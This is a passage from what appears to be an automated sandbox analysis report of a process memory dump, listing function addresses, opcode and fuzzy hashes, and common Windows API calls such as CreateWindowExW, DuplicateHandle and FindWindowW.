                                                                                • Opcode Fuzzy Hash: 01caac7e2ecf509b3c59d6880d8d45dbb921cbd460dbfbd7ae90e9892ce30829
                                                                                • Instruction Fuzzy Hash: 797194B4E016288FEB58CF6AC944B9DBBF2AF89300F14C1AAD40DA7255DB345A85CF51
                                                                                Function 37B9E983 Relevance: .2, Instructions: 164COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b960b78a7bad9afc4817e86071a5efed4fb4a11558edf8f41d71f81a7742d255
                                                                                • Instruction ID: bcd7106f4a15e175a6c33fd539f1f17b40234f76e7920500627db73d0045a81b
                                                                                • Opcode Fuzzy Hash: b960b78a7bad9afc4817e86071a5efed4fb4a11558edf8f41d71f81a7742d255
                                                                                • Instruction Fuzzy Hash: 7D7196B5E016288FEB58CF6AC844B99BBF2AF89300F14C1AAD40DA7255DB345A85CF51
                                                                                Function 37B9C9F8 Relevance: .2, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 92d8e4759aa236d650db4dd5061e1fbbd5b2cb02e6d82a5cf9645fd568087400
                                                                                • Instruction ID: b9dfe60a6246d2a3d42c1ad9cf4ed3cc089814666ddf3887209d0e42ed868fef
                                                                                • Opcode Fuzzy Hash: 92d8e4759aa236d650db4dd5061e1fbbd5b2cb02e6d82a5cf9645fd568087400
                                                                                • Instruction Fuzzy Hash: A37193B5E016288FEB58CF6AC944BDDBBF2AF89300F14C1AAD40DA7255DB344A85CF50
                                                                                Function 0016CD18 Relevance: .1, Instructions: 140COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: de258a1ea3f7a05eb4e4079d62b2389d39bcde0bb4f1d584f1cc5c86d6ce6739
                                                                                • Instruction ID: 97c2c01712d6ed75ed6a238a82add6ee21ffd0ab55a651243dfaf9e22ba7c34a
                                                                                • Opcode Fuzzy Hash: de258a1ea3f7a05eb4e4079d62b2389d39bcde0bb4f1d584f1cc5c86d6ce6739
                                                                                • Instruction Fuzzy Hash: 9D518274E01208DFDB48DFAAD9849DDBBF2BF89300F249169E409AB365DB31A905DF50
                                                                                Function 37B9B15A Relevance: .1, Instructions: 114COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d0f26eb4126290f3fe471e8dc33c652dd7d221443075d4a9a4a0d0283bb0eaa2
                                                                                • Instruction ID: cd07f61585bbf562ddf7ed4d288c369b42ae5458a56fb3db321901b152599d89
                                                                                • Opcode Fuzzy Hash: d0f26eb4126290f3fe471e8dc33c652dd7d221443075d4a9a4a0d0283bb0eaa2
                                                                                • Instruction Fuzzy Hash: 8041C3B0D016188FEB18DFAAD8447DEBBB2AF89304F14C169C418BB254DB755946CF64
                                                                                Function 37B9D690 Relevance: .1, Instructions: 111COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f8c1f31de2b12a366a6e4931f2aa5cefe240dfe444c57343703f7c7c6b819a62
                                                                                • Instruction ID: 5a68a403094dcb8ac4f3ea71ecfe4d715dee6f31c48bdd61efa5d1064a21ab48
                                                                                • Opcode Fuzzy Hash: f8c1f31de2b12a366a6e4931f2aa5cefe240dfe444c57343703f7c7c6b819a62
                                                                                • Instruction Fuzzy Hash: 1C4169B1E016188BEB58CF6BCD457D9FAF3AFC9200F04C1BAC50CA6264DB740A868F51
                                                                                Function 37B9DCE0 Relevance: .1, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c4e8cfe6501d20e57765ae7b2d8c13cb153ac84ed63c2ef08e44488c910c5c15
                                                                                • Instruction ID: e04962dea5b6752540c55c3c844b1c1eb3b6876c42427ee795a75f395caaf1df
                                                                                • Opcode Fuzzy Hash: c4e8cfe6501d20e57765ae7b2d8c13cb153ac84ed63c2ef08e44488c910c5c15
                                                                                • Instruction Fuzzy Hash: 684179B1D016189BEB58CF6BC9447CAFAF3AFC9200F14C1BAD50CA6254EB740A868F50
                                                                                Function 37B9EFC9 Relevance: .1, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2443e926b03b0307427fff1ed6f107e17d0eae14962e5ed50d0271405e2ffac4
                                                                                • Instruction ID: 00d95d7b61e6593496189ebd234d90ac5f4a647ef48df2fc448f5b4f454fa6d3
                                                                                • Opcode Fuzzy Hash: 2443e926b03b0307427fff1ed6f107e17d0eae14962e5ed50d0271405e2ffac4
                                                                                • Instruction Fuzzy Hash: 424159B1D016189BEB58CF6BC9457DAFAF3AFC9210F14C1BAD50CA6264DB740A868F50
                                                                                Function 37B9BD60 Relevance: .1, Instructions: 109COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f7698cbf6a6176265fa3ba969ff63d85803574f51ad9026ce8e7b490aa3c9497
                                                                                • Instruction ID: 1ef178f078102eac9221a24bd8caafc3b419bff2ba3b3536f4b2015889b8af46
                                                                                • Opcode Fuzzy Hash: f7698cbf6a6176265fa3ba969ff63d85803574f51ad9026ce8e7b490aa3c9497
                                                                                • Instruction Fuzzy Hash: 414158B5D016188BEB58CF6BC9457CAFAF3AFC9300F14C1BAC50CA6265DB740A858F51
                                                                                Function 37B9D040 Relevance: .1, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3374631869bc0f9598d68bfeba293790d3d34e15ea564ba8e944adc048532546
                                                                                • Instruction ID: 78fefe825b60e65cbe2e77fcd82e499193efb41d104056875a3461b9e3731d66
                                                                                • Opcode Fuzzy Hash: 3374631869bc0f9598d68bfeba293790d3d34e15ea564ba8e944adc048532546
                                                                                • Instruction Fuzzy Hash: EA4147B1E016188BEB58CF6BC9557D9FAF3AFC9310F14C1BAC50CA6265DB740A868F50
                                                                                Function 37B92BAA Relevance: .1, Instructions: 98COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930382268.0000000037B90000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B90000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 54f4636abe563930a25eae3293a6fd2c70c62a4c7dd65157877fd1ff0b8a7812
                                                                                • Instruction ID: 253f451ba9956a23933afc7d6ff3fc7ec20ff4466f647679ffc71448815bb9b9
                                                                                • Opcode Fuzzy Hash: 54f4636abe563930a25eae3293a6fd2c70c62a4c7dd65157877fd1ff0b8a7812
                                                                                • Instruction Fuzzy Hash: 6B41B274D01208CBEB58DFAAD5407DEBBF2AF89300F209139D418BB255EB355946CF54
                                                                                Function 37DE64C9 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE6556
                                                                                • GetCurrentThread.KERNEL32 ref: 37DE6593
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE65D0
                                                                                • GetCurrentThreadId.KERNEL32 ref: 37DE6629
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: 5a3a3d238e8c93158033be7c270111c6bd76423ae87adf8dfb9813991b77407a
                                                                                • Instruction ID: bba8e94ad4483e5d7a34bc591c0ad81ed7f9ece36a342c535d28c239a68b865d
                                                                                • Opcode Fuzzy Hash: 5a3a3d238e8c93158033be7c270111c6bd76423ae87adf8dfb9813991b77407a
                                                                                • Instruction Fuzzy Hash: E35167B0900789DFDB01CFAAC884B9EBBF1EF48314F24845ED018A7392D774A944CB66
                                                                                Function 37DE64D8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE6556
                                                                                • GetCurrentThread.KERNEL32 ref: 37DE6593
                                                                                • GetCurrentProcess.KERNEL32 ref: 37DE65D0
                                                                                • GetCurrentThreadId.KERNEL32 ref: 37DE6629
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: fa3ba59697d2db266748a99db43091595a6c82d169275b27a4a1a85ebcbb8734
                                                                                • Instruction ID: ca93020b495f78e8aeb4f1b300750e3db49df7f81ded65acc4f3b7125a26f2de
                                                                                • Opcode Fuzzy Hash: fa3ba59697d2db266748a99db43091595a6c82d169275b27a4a1a85ebcbb8734
                                                                                • Instruction Fuzzy Hash: E75156B0900649DFDB00DFAAD884B9EBBF1EF88314F20845ED019A7351D734A944CF65
                                                                                Function 37DD09ED Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 750 37dd09ed-37dd0a5e 752 37dd0a69-37dd0a70 750->752 753 37dd0a60-37dd0a66 750->753 754 37dd0a7b-37dd0b1a CreateWindowExW 752->754 755 37dd0a72-37dd0a78 752->755 753->752 757 37dd0b1c-37dd0b22 754->757 758 37dd0b23-37dd0b5b 754->758 755->754 757->758 762 37dd0b5d-37dd0b60 758->762 763 37dd0b68 758->763 762->763 764 37dd0b69 763->764 764->764
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37DD0B0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: ec8fe377c94619efb47dc66306e5fd9eee4d0b184c008e664130821c046ddd20
                                                                                • Instruction ID: 36205d5c5badcfe38dd58ac51bf5120bfd7d6b1daa0d220a3c9478c8eca92f0f
                                                                                • Opcode Fuzzy Hash: ec8fe377c94619efb47dc66306e5fd9eee4d0b184c008e664130821c046ddd20
                                                                                • Instruction Fuzzy Hash: 1651B0B1D00209AFDB14CF9AD880ADDFBB5FF88354F60812AE418AB250D774A985CF91
                                                                                Function 37DD09F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 765 37dd09f8-37dd0a5e 766 37dd0a69-37dd0a70 765->766 767 37dd0a60-37dd0a66 765->767 768 37dd0a7b-37dd0b1a CreateWindowExW 766->768 769 37dd0a72-37dd0a78 766->769 767->766 771 37dd0b1c-37dd0b22 768->771 772 37dd0b23-37dd0b5b 768->772 769->768 771->772 776 37dd0b5d-37dd0b60 772->776 777 37dd0b68 772->777 776->777 778 37dd0b69 777->778 778->778
                                                                                APIs
                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37DD0B0A
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: 9d4c437ada2a875e7e8b3e58f7a2e6e23ab67f76ccd0470cd08e37e9cd0c3362
                                                                                • Instruction ID: 1db58fd4d92ca452faa041c9eb429a5cc2bf1c4eea0807bdb05d11e08aae9ea3
                                                                                • Opcode Fuzzy Hash: 9d4c437ada2a875e7e8b3e58f7a2e6e23ab67f76ccd0470cd08e37e9cd0c3362
                                                                                • Instruction Fuzzy Hash: 6541BEB5D00309DFDB14CF9AD880ADEFBB5BF88314F64812AE418AB250D774A985CF91
                                                                                Function 37DE66A7 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 779 37de66a7-37de66b4 780 37de66b6-37de66e1 call 37de60b4 779->780 781 37de6727-37de67b4 DuplicateHandle 779->781 785 37de66e6-37de670c 780->785 783 37de67bd-37de67da 781->783 784 37de67b6-37de67bc 781->784 784->783
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37DE67A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 38d81eab948f81b5d76a14041a6bc1bbf785f8e5a8697a0e841578644b64041b
                                                                                • Instruction ID: 55813264cc1be7225d73c87dc88b4b72fbcec44770ecec3c3a7fa3fb173c9ab2
                                                                                • Opcode Fuzzy Hash: 38d81eab948f81b5d76a14041a6bc1bbf785f8e5a8697a0e841578644b64041b
                                                                                • Instruction Fuzzy Hash: DA416776900249AFCB02CF99D840ADEBFF5FF49310F14806AE944A7311C335AA10DFA1
                                                                                Function 37DD3140 Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 790 37dd3140-37dd317c 791 37dd322c-37dd324c 790->791 792 37dd3182-37dd3187 790->792 798 37dd324f-37dd325c 791->798 793 37dd3189-37dd31c0 792->793 794 37dd31da-37dd3212 CallWindowProcW 792->794 801 37dd31c9-37dd31d8 793->801 802 37dd31c2-37dd31c8 793->802 796 37dd321b-37dd322a 794->796 797 37dd3214-37dd321a 794->797 796->798 797->796 801->798 802->801
                                                                                APIs
                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 37DD3201
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: CallProcWindow
                                                                                • String ID:
                                                                                • API String ID: 2714655100-0
                                                                                • Opcode ID: 83d2fe6614a3fefcc0f77595d54c5492e3d18d27f387c1e6ba94316846930425
                                                                                • Instruction ID: 1b545caeee6a45bc93bc29b58bbe3a661ee5039cc3afebd06da5e0a90bc19062
                                                                                • Opcode Fuzzy Hash: 83d2fe6614a3fefcc0f77595d54c5492e3d18d27f387c1e6ba94316846930425
                                                                                • Instruction Fuzzy Hash: D34114B9A00709DFDB04CF99C884B9AFBF5FF98314F258859D418AB721D774A845CBA0
                                                                                Function 37DE6719 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 805 37de6719-37de67b4 DuplicateHandle 806 37de67bd-37de67da 805->806 807 37de67b6-37de67bc 805->807 807->806
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37DE67A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: d7ffe3dfb8013f55584b56959abd3d05418e33fcdede1d5df0163d7bd324e340
                                                                                • Instruction ID: b89379c68740961bce9fb603b42ecb81d133f52dd5fe0f74c3c2967b63357742
                                                                                • Opcode Fuzzy Hash: d7ffe3dfb8013f55584b56959abd3d05418e33fcdede1d5df0163d7bd324e340
                                                                                • Instruction Fuzzy Hash: 4921E3B5900648AFDB10CFAAD980ADEFBF4FF48320F14842AE954A7350D374A954CFA5
                                                                                Function 37DE6720 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 810 37de6720-37de67b4 DuplicateHandle 811 37de67bd-37de67da 810->811 812 37de67b6-37de67bc 810->812 812->811
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37DE67A7
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 94e4d2bd0f43d1ddd84b0f4c4f54808031b528073d5a5bc32ca751b62b297184
                                                                                • Instruction ID: d4712658e698a299ab09f456d78085c1f641cb1d5d06a8ca1b59fab2e62bc67a
                                                                                • Opcode Fuzzy Hash: 94e4d2bd0f43d1ddd84b0f4c4f54808031b528073d5a5bc32ca751b62b297184
                                                                                • Instruction Fuzzy Hash: 9A21E4B5900248AFDB10CFAAD880ADEFBF8EF48310F14841AE954A7350D374A954CFA5
                                                                                Function 37DEBCF8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 815 37debcf8-37debd43 816 37debd4b-37debd4f 815->816 817 37debd45-37debd48 815->817 818 37debd57-37debd83 FindWindowW 816->818 819 37debd51-37debd54 816->819 817->816 820 37debd8c-37debda0 818->820 821 37debd85-37debd8b 818->821 819->818 821->820
                                                                                APIs
                                                                                • FindWindowW.USER32(00000000,00000000), ref: 37DEBD76
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: FindWindow
                                                                                • String ID:
                                                                                • API String ID: 134000473-0
                                                                                • Opcode ID: 7e555fcfa6482c53c1a07c8a1b56c43a01f8563dc1df2848143e6deba56d8387
                                                                                • Instruction ID: 0098d0421998dd3052747578c188ffb7ae423c1edeaee2311d21293d199f254c
                                                                                • Opcode Fuzzy Hash: 7e555fcfa6482c53c1a07c8a1b56c43a01f8563dc1df2848143e6deba56d8387
                                                                                • Instruction Fuzzy Hash: C52110B98016498FCB00CF9AD884ADEFBF4BF49320F24852ED41AA7600D374A545CFA1
                                                                                Function 37DEA624 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 823 37dea624-37debd43 825 37debd4b-37debd4f 823->825 826 37debd45-37debd48 823->826 827 37debd57-37debd83 FindWindowW 825->827 828 37debd51-37debd54 825->828 826->825 829 37debd8c-37debda0 827->829 830 37debd85-37debd8b 827->830 828->827 830->829
                                                                                APIs
                                                                                • FindWindowW.USER32(00000000,00000000), ref: 37DEBD76
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930769058.0000000037DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DE0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: FindWindow
                                                                                • String ID:
                                                                                • API String ID: 134000473-0
                                                                                • Opcode ID: 98be72e8e3e24bfcdf0314b09481ab07cb90f30fa4ce4a141399adb5a465045e
                                                                                • Instruction ID: 8e831ac679c8d929b5cc3d89cb736c13a729748afd31469285f0fba85198b88f
                                                                                • Opcode Fuzzy Hash: 98be72e8e3e24bfcdf0314b09481ab07cb90f30fa4ce4a141399adb5a465045e
                                                                                • Instruction Fuzzy Hash: 512133B58017099FCB00CF9AC880ADEFBF8FF49220F14852ED419AB600C374A544CFA1
                                                                                Function 37DD5670 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 37DD56CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 10607068ec74b8bb2e60140ec9dc0378d1bd41400e4044450902e435f91f60b6
                                                                                • Instruction ID: d898acac00e295ff626df0475ee7754f9017fe3d2e4e103d7cacb8f7df6f2d1a
                                                                                • Opcode Fuzzy Hash: 10607068ec74b8bb2e60140ec9dc0378d1bd41400e4044450902e435f91f60b6
                                                                                • Instruction Fuzzy Hash: 3B1103B59007488FCB10DFAAD884BDEFFF4EF49220F24855AD519A7241D374A944CBA5
                                                                                Function 37DD4840 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 37DD56CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42930737080.0000000037DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37DD0000, based on PE: false
                                                                                Similarity
                                                                                • API ID: Initialize
                                                                                • String ID:
                                                                                • API String ID: 2538663250-0
                                                                                • Opcode ID: 80e32a0e930cf6d7feef06fff12008027e203cf165006d2b60e05a59188935eb
                                                                                • Instruction ID: 8dfa6058f1f3a1c9fd1d82a550a53838234f6fdd2d8ac2c17969f619f91102a4
                                                                                • Opcode Fuzzy Hash: 80e32a0e930cf6d7feef06fff12008027e203cf165006d2b60e05a59188935eb
                                                                                • Instruction Fuzzy Hash: 291112B59007489FDB10DFAAD884B9EFBF4EF48320F20841AD519A7741D378A944CFA5
                                                                                Function 0016A654 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4
                                                                                • API String ID: 0-4088798008
                                                                                • Opcode ID: ca827a4ad411473af9d50ef1a1f26997d35fc0c4701b04b4abb0efcbf1f772b0
                                                                                • Instruction ID: 9082e4a376307596df557429471513c884d83e3515550c24c42daf87ee637b85
                                                                                • Opcode Fuzzy Hash: ca827a4ad411473af9d50ef1a1f26997d35fc0c4701b04b4abb0efcbf1f772b0
                                                                                • Instruction Fuzzy Hash: 82113035B00208ABDB149F65DC48A9EBBFABF8D711F54806AE902A7350DB71AD10CB90
                                                                                Function 00161F61 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: T
                                                                                • API String ID: 0-2145084337
                                                                                • Opcode ID: 2299b8df7932fe3f5ac9fac5778054a39966f3cd9d616ce655d5cde5fbe64c98
                                                                                • Instruction ID: df3507456ee53b52981c866b2e584a2308aced9406ff5dff2f6d92907ce024e6
                                                                                • Opcode Fuzzy Hash: 2299b8df7932fe3f5ac9fac5778054a39966f3cd9d616ce655d5cde5fbe64c98
                                                                                • Instruction Fuzzy Hash: BE21C274C046098FCB41EFB8D8455EDBFF1BF49301F50516AD805B7264EB345A99CBA1
                                                                                Function 00160C8F Relevance: .4, Instructions: 406COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b5703a74738362089ab5e067bf31fe84f12eda44c380c61f817a36b80ecb4711
                                                                                • Instruction ID: 944ab86367223e84c0bede78e87cd27c367c370700da0129124f143acf1a94a6
                                                                                • Opcode Fuzzy Hash: b5703a74738362089ab5e067bf31fe84f12eda44c380c61f817a36b80ecb4711
                                                                                • Instruction Fuzzy Hash: C822D57491025ACFCB54DFA4EC94A9DBBB1BF89705F1086A5D409AB360DF306E86CF81
                                                                                Function 00160CA0 Relevance: .4, Instructions: 395COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6872014813c17a9f83b5ba7ecb4ad09c7a56746167ad44f14d6704b2423919
                                                                                • Instruction ID: eb208235bf8887232c7c79b74f3c9ab208d64ca8d83e9d37a453f497693838aa
                                                                                • Opcode Fuzzy Hash: 8c6872014813c17a9f83b5ba7ecb4ad09c7a56746167ad44f14d6704b2423919
                                                                                • Instruction Fuzzy Hash: C322C574A1025ACFDB54DFA4EC94A9DB7B1BF89705F1086A5D409AB360DF306E86CF80
                                                                                Function 00167085 Relevance: .3, Instructions: 328COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bf7129a7f68e286f80c326c8569df341ce33e5c0bfea31d1b019e36c4e013ac9
                                                                                • Instruction ID: 43b3b03470319004c8c1a22ca317bcc217144ef818ba2ac88e068470717e0418
                                                                                • Opcode Fuzzy Hash: bf7129a7f68e286f80c326c8569df341ce33e5c0bfea31d1b019e36c4e013ac9
                                                                                • Instruction Fuzzy Hash: 8ED16A30A04209CFCB24DFA8D994AADBBF2FF89318F158599E8059B2A1D730ED51CB50
                                                                                Function 001687F3 Relevance: .3, Instructions: 320COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 523120558a78a9e3ac70ed4a4d3254d2fb4b1e8259c3829e8f1fa348e1c31896
                                                                                • Instruction ID: 796d38ed6f09ef3cb0b364abbafa5e47b888fb31c30eab482919628100768b37
                                                                                • Opcode Fuzzy Hash: 523120558a78a9e3ac70ed4a4d3254d2fb4b1e8259c3829e8f1fa348e1c31896
                                                                                • Instruction Fuzzy Hash: 3DB16EB07141018FDB199B2CCD58B39769AEF81705F29416AEA02CF3B1EF25CC62D742
                                                                                Function 0016A92F Relevance: .3, Instructions: 256COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908773760.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a8a764920d83a7303cb179811b2dcb9353791c4ede1dd3e3ad1017c4c42703a3
                                                                                • Instruction ID: 56c3c74d11aa8c28e3cfd0807d9bc03be43bb54b2286cffb2e2ba81781080d54
